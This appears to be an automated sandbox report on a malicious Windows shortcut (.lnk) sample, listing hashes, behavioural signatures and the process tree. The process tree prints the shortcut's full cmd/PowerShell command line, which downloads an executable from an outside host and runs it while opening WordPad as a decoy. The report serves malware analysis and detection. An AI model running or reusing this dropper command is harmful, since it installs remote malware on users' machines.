Analysis
  max time kernel: 30s
  max time network: 33s
  platform: windows7_x64
  resource: win7-20221111-en
  resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  submitted: 02/02/2023, 13:36
Static task
  static1
Behavioral task
  behavioral1
    Sample: 43843_8439_8329098.lnk
    Resource: win7-20221111-en
Behavioral task
  behavioral2
    Sample: 43843_8439_8329098.lnk
    Resource: win10v2004-20220812-en
General
  Target: 43843_8439_8329098.lnk
  Size: 130KB
  MD5: 2fcb95c29131b2bdb9f864f492a3bcd1
  SHA1: 7ffa77710ae6a95b3759643852a5a829c550a36e
  SHA256: 36a4e3cebb2ed11077cca219e6033a31a60fc8924ed48b79e216d4ceefcc08f5
  SHA512: a527d90b15ce7556ae167aba16cfbda8d213b87ec8d2e095ba57060ae7af3315de7bfcbbaddca8e7ad4ff8c7f6a40f5f9e3b8bdea25292a24f2d31740368baa7
  SSDEEP: 3072:EE+n8y1Bzt+mwV4jUs8Nu+GEodNn6/f1DaiSGeQnHkJ6U:EE+nPvxwV28NTGEoEAbGXHM6U
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
    flow  pid   Process
    4     1960  powershell.exe
    5     1960  powershell.exe
    6     1960  powershell.exe

- Drops file in System32 directory (1 IoC)
    description                   ioc                                                                                                                                    Process
    File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe

- Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Suspicious behavior: EnumeratesProcesses (1 IoC)
    pid   Process
    1960  powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
    description              pid   Process
    Token: SeDebugPrivilege  1960  powershell.exe

- Suspicious use of SetWindowsHookEx (5 IoCs)
    pid   Process
    1564  wordpad.exe
    1564  wordpad.exe
    1564  wordpad.exe
    1564  wordpad.exe
    1564  wordpad.exe

- Suspicious use of WriteProcessMemory (9 IoCs)
    description                       pid   Process  procid_target
    PID 1652 wrote to memory of 1748  1652  cmd.exe  29
    PID 1652 wrote to memory of 1748  1652  cmd.exe  29
    PID 1652 wrote to memory of 1748  1652  cmd.exe  29
    PID 1748 wrote to memory of 1960  1748  cmd.exe  30
    PID 1748 wrote to memory of 1960  1748  cmd.exe  30
    PID 1748 wrote to memory of 1960  1748  cmd.exe  30
    PID 1748 wrote to memory of 1564  1748  cmd.exe  31
    PID 1748 wrote to memory of 1564  1748  cmd.exe  31
    PID 1748 wrote to memory of 1564  1748  cmd.exe  31
Processes
  1. C:\Windows\system32\cmd.exe (PID 1652)
     Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\43843_8439_8329098.lnk
     - Suspicious use of WriteProcessMemory

     2. C:\Windows\System32\cmd.exe (PID 1748)
        Command line: "C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\Admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________
        - Suspicious use of WriteProcessMemory

        3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1960)
           Command line: powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"
           - Blocklisted process makes network request
           - Drops file in System32 directory
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of AdjustPrivilegeToken

        3. C:\Program Files\windows nt\accessories\wordpad.exe (PID 1564)
           Command line: "C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys
           - Suspicious use of SetWindowsHookEx